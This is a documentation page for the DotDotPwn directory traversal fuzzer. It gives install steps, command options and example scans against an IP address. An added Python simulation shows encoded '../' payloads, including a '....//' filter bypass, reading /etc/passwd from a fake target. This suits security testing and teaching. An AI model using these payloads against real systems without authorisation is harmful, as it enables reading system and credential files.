
Dotdotpwn

DotDotPwn is a directory traversal fuzzer written by Christian Navarrete (aka chr1x). It identifies directory traversal vulnerabilities in several services (HTTP, FTP, TFTP) by sending many encoded variants of ../ sequences and checking the responses. Fuzzing modules are:

  • HTTP
  • HTTP URL
  • FTP
  • TFTP
  • Payload (protocol independent)
  • STDOUT

Written in Perl, the application runs on *nix and Windows platforms.

Installation

$ mkdir -p /data/src/
$ cd /data/src/
$ wget http://chr1x.sectester.net/dotdotpwn/dotdotpwn-v2.1.tar.gz
$ tar xzvf dotdotpwn-v2.1.tar.gz

Usage

$ ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]

Options

-m <module>
    Module (http | http-url | ftp | tftp | payload | stdout)
-h <host>
    Hostname
-O
    Operating System detection for intelligent fuzzing (nmap)
-s
    Service version detection (banner grabber)
-d
    Depth of traversals (e.g. depth 3 equals ../../../)
    default: 6
-f
    Specific filename (e.g. /etc/motd)
    default: filenames defined in the TraversalEngine.pm
-u <url>
    URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
-k <string_pattern>
    String pattern to match in the response if it's vulnerable (e.g. "root:" if trying with /etc/passwd)
-U <username>
    Username
    default: 'anonymous'
-P <password>
    Password
    default: 'dot@dot.pwn'
-p <file>
    Filename with the payload to be sent and the part to be fuzzed marked as TRAVERSAL
-x <port>
    Port to connect
    default: HTTP=80, FTP=21, TFTP=69
-t <number>
    Time in milliseconds between each test
    default: 300 (.3 second)
-b
    Break after the first vulnerability is found
-q
    Quiet mode (doesn't print each attempt)

Examples

$ ./dotdotpwn.pl -m http -h 80.14.163.161

It is recommended that you redirect the output to a text file so the results can be analyzed later:

$ ./dotdotpwn.pl -m http -h 80.14.163.161 > http_audit.txt
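The examples above need a live host. To make the option semantics concrete without one, the following Python is an added example, not DotDotPwn's own code: it reproduces the http-url workflow (a -u template with TRAVERSAL, -d depth, -f filename, -k match pattern and -b break-on-first) against a constructed in-process target instead of a network host. The encoding list is a small subset modelled on what the tool's TraversalEngine generates, and the fake web root, fake filesystem and the target's weak "strip ../ once" filter are assumptions built for illustration.

```python
"""Offline simulation of DotDotPwn's http-url module. Added example, not the
tool's code. fake_target(), WEBROOT, FAKE_FS and TRAVERSAL_UNITS are
constructed assumptions; nothing here talks to a network."""
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Subset of encodings for one "../" step. The real TraversalEngine emits far
# more variants (UTF-8 overlongs, NULL bytes, more Windows forms, ...).
TRAVERSAL_UNITS = [
    "../",          # plain
    "..%2f",        # URL-encoded slash
    "%2e%2e/",      # URL-encoded dots
    "%2e%2e%2f",    # everything encoded
    "..%252f",      # double-encoded slash
    "....//",       # survives a single, non-recursive strip of "../"
    "..\\",         # Windows separator
    "..%5c",        # URL-encoded backslash
]

# Constructed fake web root and filesystem for the simulated target.
WEBROOT = "/var/www/images"
FAKE_FS = {
    "/var/www/images/logo.png": "PNG...",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33::/var/www:/usr/sbin/nologin\n",
}


def traversals(depth=6, filename="/etc/passwd"):
    """Yield candidate payloads: every encoding at every depth 1..depth (-d),
    followed by the requested file with its leading slash removed (-f)."""
    target = filename.lstrip("/")
    for d in range(1, depth + 1):
        for unit in TRAVERSAL_UNITS:
            yield unit * d + target


def fake_target(url):
    """Constructed stand-in for the remote id.php?x=... endpoint. The query is
    parsed by hand so the parameter is percent-decoded exactly once, as a real
    server would. Its 'fix', stripping "../" in a single pass, is the assumed
    vulnerability: "....//" collapses to "../" after the strip."""
    query = urlsplit(url).query
    params = dict(kv.split("=", 1) for kv in query.split("&") if "=" in kv)
    decoded = unquote(params.get("x", ""))
    filtered = decoded.replace("../", "")
    path = normpath(WEBROOT + "/" + filtered)      # resolves "..", clamps at "/"
    return FAKE_FS.get(path, "404 Not Found")


def fuzz(send, template, pattern, depth=6, filename="/etc/passwd", break_on_first=True):
    """Substitute each payload for TRAVERSAL in the template (-u), send it, and
    collect the URLs whose response matches the pattern (-k). break_on_first
    mirrors -b."""
    hits = []
    for payload in traversals(depth, filename):
        url = template.replace("TRAVERSAL", payload)
        if re.search(pattern, send(url)):
            hits.append(url)
            if break_on_first:
                break
    return hits


if __name__ == "__main__":
    template = "http://foo:8080/id.php?x=TRAVERSAL&y=31337"   # the page's own -u example
    for url in fuzz(fake_target, template, "root:", break_on_first=False):
        print("VULNERABLE:", url)
```

Only the "....//" variant reaches /etc/passwd against this target, and only from depth 3 upward, because the fake web root sits three directories below /. That is the whole point of a traversal fuzzer: one hand-written ../../../etc/passwd would have reported the endpoint as safe. When you run the real tool, -k is what turns a response into a finding, so choose a pattern that can only come from the file you asked for ("root:" for /etc/passwd, a boot.ini section name on Windows) rather than something a 200 page might contain anyway.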